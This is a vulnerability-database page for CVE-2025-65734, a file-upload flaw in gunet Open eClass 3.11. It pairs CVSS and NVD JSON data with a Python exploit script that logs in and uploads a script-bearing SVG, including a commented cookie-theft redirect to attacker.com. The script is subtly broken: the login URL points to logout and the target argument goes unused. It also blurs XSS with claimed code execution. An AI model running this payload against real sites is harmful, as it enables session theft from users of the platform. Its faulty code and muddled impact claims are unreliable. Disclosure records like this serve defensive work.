Security Vulnerability Report
CVE-2025-65734 CVSS 5.4 MEDIUM

Published: 2026-03-16 17:16:28
Last Modified: 2026-04-17 21:01:15

Description

An authenticated arbitrary file upload vulnerability in the Courses/Work Assignments module of gunet Open eClass v3.11 (fixed in v3.13) allows attackers to execute arbitrary code by uploading a crafted SVG file.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openeclass:openeclass:*:*:*:*:*:*:*:* - VULNERABLE
gunet Open eClass < 3.11
gunet Open eClass 3.11
gunet Open eClass <= 3.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-65734 PoC - Malicious SVG File Upload
# Target: gunet Open eClass < 3.13
# Module: Courses/Work Assignments

TARGET_URL = "http://target-server.com"  # Replace with target URL
LOGIN_URL = f"{TARGET_URL}/index.php?logout"
UPLOAD_URL = f"{TARGET_URL}/modules/work/work.php"

MALICIOUS_SVG = """<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="300" height="200">
  <script type="text/javascript">
    // Malicious JavaScript - XSS payload
    alert('XSS - CVE-2025-65734');
    // For RCE via SVG, this would need server-side processing
    // Example: <script>document.location='http://attacker.com/steal?c='+document.cookie</script>
  </script>
  <rect width="300" height="200" fill="red"/>
  <text x="10" y="100" fill="white">Malicious SVG</text>
</svg>"""


def login(session, username, password):
    """Login to Open eClass with low-privilege account"""
    login_data = {
        'username': username,
        'password': password,
        'submit': 'Login'
    }
    response = session.post(LOGIN_URL, data=login_data)
    return 'login' not in response.url.lower()


def upload_malicious_svg(session):
    """Upload malicious SVG file via Work Assignments module"""
    files = {
        'userfile': ('malicious.svg', MALICIOUS_SVG, 'image/svg+xml')
    }
    data = {
        'id': '1',             # Course ID
        'assignment_id': '1',  # Assignment ID
        'submit': 'Submit'
    }
    response = session.post(UPLOAD_URL, files=files, data=data)
    return response


def main():
    if len(sys.argv) != 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        sys.exit(1)

    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]

    session = requests.Session()

    print("[*] Logging in to Open eClass...")
    if not login(session, username, password):
        print("[-] Login failed")
        sys.exit(1)

    print("[*] Uploading malicious SVG file...")
    response = upload_malicious_svg(session)
    if response.status_code == 200:
        print("[+] SVG file uploaded successfully")
        print("[*] Access the file at: " + response.url)
        print("[*] If server executes SVG as PHP, remote code execution is possible")
    else:
        print("[-] Upload failed")


if __name__ == "__main__":
    main()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65734", "sourceIdentifier": "[email protected]", "published": "2026-03-16T17:16:28.137", "lastModified": "2026-04-17T21:01:15.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authenticated arbitrary file upload vulnerability in the Courses/Work Assignments module of gunet Open eClass v3.11, and fixed in v3.13, allows attackers to execute arbitrary code via uploading a crafted SVG file."}, {"lang": "es", "value": "Una vulnerabilidad de carga arbitraria de archivos autenticada en el módulo de Cursos/Asignaciones de Trabajo de gunet Open eClass v3.11, y corregida en la v3.13, permite a los atacantes ejecutar código arbitrario mediante la carga de un archivo SVG manipulado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openeclass:openeclass:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.11", "versionEndExcluding": "3.13", "matchCriteriaId": "08E7B986-4415-4530-A12F-B14BC96AC59F"}]}]}], "references": [{"url": "https://github.com/apostolides", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://huntr.com/bounties/540f743c-fa3e-4be6-9f85-439fff2fc5fe", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": 
"https://huntr.com/users/apostolides", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.linkedin.com/in/thanos-apostolidis-3255591b1/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}